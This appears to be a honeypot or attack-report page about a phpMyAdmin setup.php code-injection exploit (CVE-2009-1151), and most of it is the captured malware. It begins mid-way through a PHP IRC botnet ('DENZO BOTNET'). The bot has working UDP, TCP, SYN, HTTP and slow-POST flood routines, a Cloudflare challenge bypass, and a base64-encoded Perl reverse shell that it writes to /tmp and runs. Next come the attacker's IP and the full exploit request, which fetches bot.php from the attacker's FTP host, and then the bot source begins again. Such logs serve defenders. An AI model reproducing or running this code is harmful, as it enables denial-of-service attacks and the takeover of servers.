$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttp host port time [method] [url]");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
public function set_nick() {
$fp = fsockopen("freegeoip.app", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[BR]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.app/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[BR]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
$nicky=array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z");
$this->nick1 = $nicky[rand(0,count($nicky) - 1)];
$this->nick2 = $nicky[rand(0,count($nicky) - 1)];
$this->nick3 = $nicky[rand(0,count($nicky) - 1)];
$this->nick4 = $nicky[rand(0,count($nicky) - 1)];
$this->nick5 = $nicky[rand(0,count($nicky) - 1)];
$this->nick6 = $nicky[rand(0,count($nicky) - 1)];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->send("NICK " . $this->nick);
$this->send("NICK ".$this->nick.$this->nick1.$this->nick2.$this->nick3.$this->nick4.$this->nick5.$this->nick6."");
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"\2[\2DENZO BOTNET | * UDPFLOOD ATACAR EM CURSO SOBRE: $host !!!\2]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | $env MB enviados / Media: $vel mbp/s launch\2]\2");
}
//////////// Rudy Flood Added by Hax Stroke
function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2Rudy Flood Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Rudy Flood Finished!\2]");
}
function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JS-BYPASS ATTACKING $host:$port FOR $time WITH $method METHOD ON THE $url PATH !!!\2]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare Detected !\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2JSBYPASS METHOD BY DENZELHAX ATTACKING !\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JSBYPASS STOPPING ON $host !!!\2]\2");
}
////////////
//////////// UDP FLOOD VERSION 2.0 ADDED BY HAX STROKE
function udpfloodv2($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | * MASSUDP ATACAR EM CURSO SOBRE: $host:$port !!!\2]\2");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "04Ataque Finalizado Com Sucesso!");
}
////////////
function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
/////////////
function HTTP_Flood( $host , $page , $length )
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing $host on $page path with $length lenght - Disconnected...]\2");
if ( $page == '' )
{
$page = '/';
}
$max_time = time() + $length;
$packet .= 'GET ' . $page . ' HTTP/1.1' . "\r\n";
$packet .= 'Host: ' . $host . "\r\n";
$packet .= 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0b7) Gecko/20100101 Firefox/4.0b7' . "\r\n";
$packet .= 'Keep-alive: 300' . "\r\n";
$packet .= 'Connection: keep-alive' . "\r\n\r\n";
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
while( 1 )
{
if ( time() > $max_time )
{
break;
}
if( $fp )
{
fwrite( $fp , $packet );
fclose( $fp );
$packets++;
}
else
{
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
}
}
if ( $packets == 0 )
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],'<br /><b>An error occurred! Could not send packets.</b><br />' . "\n");
}
else
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],$host) ;
$this->privmsg($this->config['chan'],$length) ;
$this->privmsg($this->config['chan'],'<b>Packets:</b> ' . round($packets) . ' ( ' . round($packets/$length) . ' packets/s ) <br />' . "\n");
}
return 0;
}
////////////
function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
////////////
function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Killing $host:$port for $time - Disconnected...]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Finished ! - Connected...]\2");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing TCP Connection $host:$port - Disconnected...]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNr ? IEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0 ? XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4i ? Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQg ? PSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHBy ? b3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZF ? UiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsN ? Cm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAi ? U25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIp ? Ow0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVu ? KFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERF ? UlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBl ?eGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
$bot = new pBot;
$bot->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.110.227.41
Dest. port: 80
Time: 05/10/2019 20:13:47
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 234
cookie2: $Version="1"
Host: 6.145.23.134
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://6.145.23.134/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 91e62db93324cf2680b117e568cf6df0
Type: text/x-php
Size: 41796
URL: ftp://95.110.227.41/bot.php
<?php
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.3",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
